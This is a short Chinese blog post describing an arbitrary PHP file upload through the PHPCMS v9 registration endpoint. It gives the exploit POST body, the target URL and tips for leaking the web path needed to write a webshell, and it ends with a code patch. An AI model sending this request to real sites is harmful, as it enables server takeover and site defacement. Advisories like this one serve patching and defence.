前端录网站,记录前端点点滴滴,帮助程序猿快速成长!

v9 POST数据直接上传任意脚本

PHPCMSV9
描述:

利用的是通过网站的注册页面,发送POST数据过去 ,可以绕过直接上传任意脚本文件(PHP木马文件),从而被攻击者利用,并拿到服务器管理者权限,危害巨大。

代码如下:
 
POST数据:
 
siteid=1&modelid=11&username=sinesafe&password=sinesafe&email=sinesafe@qq.com&info[content]=<img src=>&dosubmit=1&protocol=
 
POST地址:
 
www.网站地址.com/index.php?m=member&c=index&a=register&siteid=1
 
USERNAME 和 Email 的值尽量不要跟之前注册的一样,一样的话也可以正常下载到目标,但是不会爆出网站的路径,没有网站路径就写不了木马文件。

危害:

网站被跳转,被挂马,以及百度快照被劫持,网站的百度快照都是一些非法页面等等。

解决方案:

在 /phpcms/libs/classes/attachment.class.php 文件,加上代码过滤检查
166行$filename = fileext($file);之后添加:
 
if(!preg_match("/($ext)/i",$filename)) continue;





转载请注明:前端录»v9 POST数据直接上传任意脚本